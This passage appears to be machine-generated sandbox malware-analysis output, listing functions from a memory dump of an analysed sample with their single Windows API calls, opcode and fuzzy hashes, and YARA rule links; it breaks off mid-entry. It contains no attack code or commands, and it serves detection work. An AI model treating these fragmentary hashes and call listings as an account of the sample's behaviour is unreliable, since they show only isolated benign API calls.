Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeTask
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 734271698-544719455
Opcode ID: ea54a8d18c81022eb9635f3034375d7325494039b5c57a161f9dcbda501413ac
Instruction ID: 97166e09749915100436542396b9c5ee60712ed5df2677c63ab29a003dbf545c
Opcode Fuzzy Hash: ea54a8d18c81022eb9635f3034375d7325494039b5c57a161f9dcbda501413ac
Instruction Fuzzy Hash: 45E09275704604AFE7219FA6DD22F1E7BECE749F00BA144A3F900D66C1D678AD109A18

Uniqueness

Uniqueness Score: -1.00%

Function 004AAB10, Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004AAB4D

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4fdd9f033404721df2e155fd5605cef61fe1f312c88f640614ddb3b7f7a101af
Instruction ID: 5de1926a2839ddf32ba0c0ef62d3103c8ca3c69ea4801b3e123a2d7eb7fa098d
Opcode Fuzzy Hash: 4fdd9f033404721df2e155fd5605cef61fe1f312c88f640614ddb3b7f7a101af
Instruction Fuzzy Hash: 3BE04FB534426C3ED200AA9DBC51F7A77DC9759719F008013FA94DB282C07A9E14ABF8

Uniqueness

Uniqueness Score: -1.00%

Function 0047FCE8, Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0047FD14

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4d8780b082cb17675e2ccbe2fcd0e9af29cea4848a969c8d517a1122db3e5fe2
Instruction ID: e0324ee88b814fa4232cf693952619af2d285c9fcc3fcc9da0a056ce71b8dee9
Opcode Fuzzy Hash: 4d8780b082cb17675e2ccbe2fcd0e9af29cea4848a969c8d517a1122db3e5fe2
Instruction Fuzzy Hash: 30E05AB260011DAF9B40DE8CDC81EEB77ADAB1D250B408016FE08D7241C274EC518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004AA3D4, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,004AA68F,00000000,004AA6A6), ref: 004AA3FB

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 44b8ffc9d806c7c07d0b8dec3bff6de3e902ed2b513941a3925ebc673e8b4a33
Instruction ID: 3799799e066d3f2ec13c98ce16ed396c72fc4fddcbe5bf48d4b6ce8be42bf34d
Opcode Fuzzy Hash: 44b8ffc9d806c7c07d0b8dec3bff6de3e902ed2b513941a3925ebc673e8b4a33
Instruction Fuzzy Hash: C5F014719212048FEF60CF38ADC435A36E7A728705F898A3A9404C3363E3748648EB55

Uniqueness

Uniqueness Score: -1.00%

Function 004AF630, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(00000000,000000FF,004CF708,00000000,004D0589,?,00000000,004D05D4,?,00000000,004D0719,?,00000000,?,00000000,00000000), ref: 004AF646

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 130151a5ada956aff49787071afa801baf2483ff64c418c73dee45086b1f9864
Instruction ID: a72e82f2d9fe92676fa3a33422cc34765faf0cec1527c6cae3c6b26c13efb460
Opcode Fuzzy Hash: 130151a5ada956aff49787071afa801baf2483ff64c418c73dee45086b1f9864
Instruction Fuzzy Hash: 55E09BB09046008BCB58CF79888075A76D15F96320F04C67AA85CCB3E5D63CC40746AA

Uniqueness

Uniqueness Score: -1.00%

Function 0047B41C, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0047B449

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcWindow
String ID:
API String ID: 181713994-0
Opcode ID: 25634872d4ce72af03b89055b95a040c859e08475323948650b878a0dc1210d4
Instruction ID: 5cb162f3b9425c3554eccc2811f6088f8d6969fb27f58a237ed41856848cae58
Opcode Fuzzy Hash: 25634872d4ce72af03b89055b95a040c859e08475323948650b878a0dc1210d4
Instruction Fuzzy Hash: 28F0B379205609AFCB40DF99D588D9ABBE8BB4C260B058595B988CB322C234FD818B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5E0, Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040D5F4

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 849ccb1cc630722e820f8d22c01cec317a8f6614d22617264c0f7bedcd348476
Instruction ID: 1e4c6feb8bd0c14f171d90cc00ea43c501c6847d79150b28584173b472c14f22
Opcode Fuzzy Hash: 849ccb1cc630722e820f8d22c01cec317a8f6614d22617264c0f7bedcd348476
Instruction Fuzzy Hash: 0DD012B22081506AD220A55B5C44DA75ADCCBC5770F10463AB658C2281D620CC058275

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5B4, Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040D5C8

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a6d3d0e1cdede41c7ab2aadb9ee0683f85a312ee3e83c3fbdac4e5d9a9ea605b
Instruction ID: c85abc1f2d444e432d0451601e1aafcd1699c6932771c0b555b87dbe8c649807
Opcode Fuzzy Hash: a6d3d0e1cdede41c7ab2aadb9ee0683f85a312ee3e83c3fbdac4e5d9a9ea605b
Instruction Fuzzy Hash: 94D05B723081107AD620965B5C44EBB6BDCCBC5774F10063EB598D31C1D630CC05C375

Uniqueness

Uniqueness Score: -1.00%

Function 0045A724, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,004C4D3D,00000000,00000000,?,00000000,00000000,?,00000000,,00000000,00000000,00000000), ref: 0045A739

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1161df8662c0aba44ba51d9b65bc9fda1c0b2d7700edc8a682a2cb8e66831ae7
Instruction ID: ba3cbc2edbd51a518339775b3092d9642fa3b6db40710e6f15196bddf723dc1c
Opcode Fuzzy Hash: 1161df8662c0aba44ba51d9b65bc9fda1c0b2d7700edc8a682a2cb8e66831ae7
Instruction Fuzzy Hash: E6E092712042408FDB89CE5CC4C9B867BE9AF4D215F4881A5EE49CB25BEB65EC488B50

Uniqueness

Uniqueness Score: -1.00%

Function 0045A6F0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,004C4A44,0000000C), ref: 0045A703

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: ad4f31fe986fd44cc49030c55f5a6b6cccc9a5ac1d6c847c819a08d3084bbe07
Instruction ID: 33656ea3233e4cfdda9e2eed6749c39e51d7542fcdc86b329b00c08c9057be71
Opcode Fuzzy Hash: ad4f31fe986fd44cc49030c55f5a6b6cccc9a5ac1d6c847c819a08d3084bbe07
Instruction Fuzzy Hash: 62E092712002409FDB88CE5CC4C8B823BE8AF09215F4880A5EE49CB24AEA65AC48CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0045A758, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000,?,?,004C4A09,0000000C), ref: 0045A76B

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: c7cf7074a665caa880df6352a8bf1e0f51914274fe53a4cf435d6a591524547b
Instruction ID: 4fed6f1bead1e826d82ef6c1d6d08b942746fe2498122949f57dd92a01f9b926
Opcode Fuzzy Hash: c7cf7074a665caa880df6352a8bf1e0f51914274fe53a4cf435d6a591524547b
Instruction Fuzzy Hash: E2E0BF752002408FEB44CE58C4C5B527BE4AF49215F4480E5EE49CF35BD775DC45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0045A78C, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000020,?,?,?,004C4539,00000000,004C46DE,?,00000000,?,?,?,004C4B68,?,0000000C), ref: 0045A79F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: aaae88518d4f0ac00878bbfc40a08b5bb4453f1ad133eba461470c321508115a
Instruction ID: 11213be60cba50cc735dcb379c7a4d0b60a121cdabfdebf35ce06bb10432b294
Opcode Fuzzy Hash: aaae88518d4f0ac00878bbfc40a08b5bb4453f1ad133eba461470c321508115a
Instruction Fuzzy Hash: D6E09A752001408BDB44CE58C4C5B927BE4AF49215F5480A9EE49CB35AEA659C49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0047EB8C, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,?,004AD48D,00000000,004AD4A6,?,?,00000000), ref: 0047EB97

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8750f7cfa68780ba347be842ad4ff4f14e4e61d15f9df3363ab5e94146d08921
Instruction ID: 4fe31d96657a96b0e8911360c08abaaf96be1d53b27b709f312f991304ad03d3
Opcode Fuzzy Hash: 8750f7cfa68780ba347be842ad4ff4f14e4e61d15f9df3363ab5e94146d08921
Instruction Fuzzy Hash: F6D012F122120055DE3491BF0CC539606C84B59328B249BA7B56EE13E3D23DA852702C

Uniqueness

Uniqueness Score: -1.00%

Function 00481434, Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00481450

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcWindow
String ID:
API String ID: 181713994-0
Opcode ID: d1f572c8df8d45808f434a8084c194e2c96dbff8bf9edfc5a4f2fe1318614efb
Instruction ID: 0016984d6659a185f013249d18ee087c054b1a6ff239e6549a9d0a57eb8f3b16
Opcode Fuzzy Hash: d1f572c8df8d45808f434a8084c194e2c96dbff8bf9edfc5a4f2fe1318614efb
Instruction Fuzzy Hash: 60D0A77110010D6FCB00DD98D840CAF33ACAB88B10B10CC06F919C7212C634FC5187B5

Uniqueness

Uniqueness Score: -1.00%

Function 0047EB44, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,?,004ABD07,00000000,?), ref: 0047EB4F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 975f53d88cea3fe7f0012b4993e8238b103f4f20d6890ad68db02f2c4c1cf399
Instruction ID: 51270bde0d8cc8ec99cae62ce868433d80924152b8d70de0c8c870994d55acf5
Opcode Fuzzy Hash: 975f53d88cea3fe7f0012b4993e8238b103f4f20d6890ad68db02f2c4c1cf399
Instruction Fuzzy Hash: 59C08CE16112001A9E10E2FF0CC648B02C8094933C3644FB7F03EE23E3E23DA822211C

Uniqueness

Uniqueness Score: -1.00%

Function 004C3E64, Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,004C4BD9,00000000,00000000,00000000,0000000C), ref: 004C3E79

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 9b0c72239ccaca0190836299fb0a6069d56c884ff20631f0de36f37fde58ba5d
Instruction ID: 23d04abac229bcf66aaf442f814edf6cb2d68a26ccb933b11de5ffd061268eca
Opcode Fuzzy Hash: 9b0c72239ccaca0190836299fb0a6069d56c884ff20631f0de36f37fde58ba5d
Instruction Fuzzy Hash: F5D0E9B52101029FD744CE5DC9C4D95B7E9FF4C21175481A4F609CB316EB66FC85CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004AAC74, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(?,?,004B8267,00000000,004B83F9,?,00000000,00000002,00000002), ref: 004AAC7B

Part of subcall function 004AA9EC: GetLastError.KERNEL32(004AA780,004AAAB7,?,004FDBB4,00000001,00000000,00000002,00000000,004FDD55,?,?,00000005,00000000,004FDD8E), ref: 004AA9EF

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
Associated: 00000007.00000002.394916053.0000000000502000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.394947568.0000000000505000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.394985960.0000000000506000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395032242.000000000050A000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395189201.000000000050D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.395207545.000000000050F000.00000008.00020000.sdmp Download File
Associated: 00000007.00000002.395245595.0000000000513000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395268061.000000000051A000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.395287840.000000000051F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 351eeb30cd41957f7cb464669e35ada0d1404ca6a40d9ddf30320966c7c1cfb8
Instruction ID: 242d799680f052610c1cb83d63b003a7645a65ebb046a71bb5bfcc4518069ac9
Opcode Fuzzy Hash: 351eeb30cd41957f7cb464669e35ada0d1404ca6a40d9ddf30320966c7c1cfb8
Instruction Fuzzy Hash: 8AC09BE131020187DF11EABEC5C1A0763DC6F1D3143444466F549CF217D768DC10C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD04, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNEL32(00000000,?,004FDB42,00000000,004FDD55,?,?,00000005,00000000,004FDD8E,?,?,00000000,?), ref: 0040DD0F

Memory Dump Source

Source File: 00000007.00000002.392541857.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392497419.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.394862833.0000000000500000.00000020.00020000.sdmp Download File
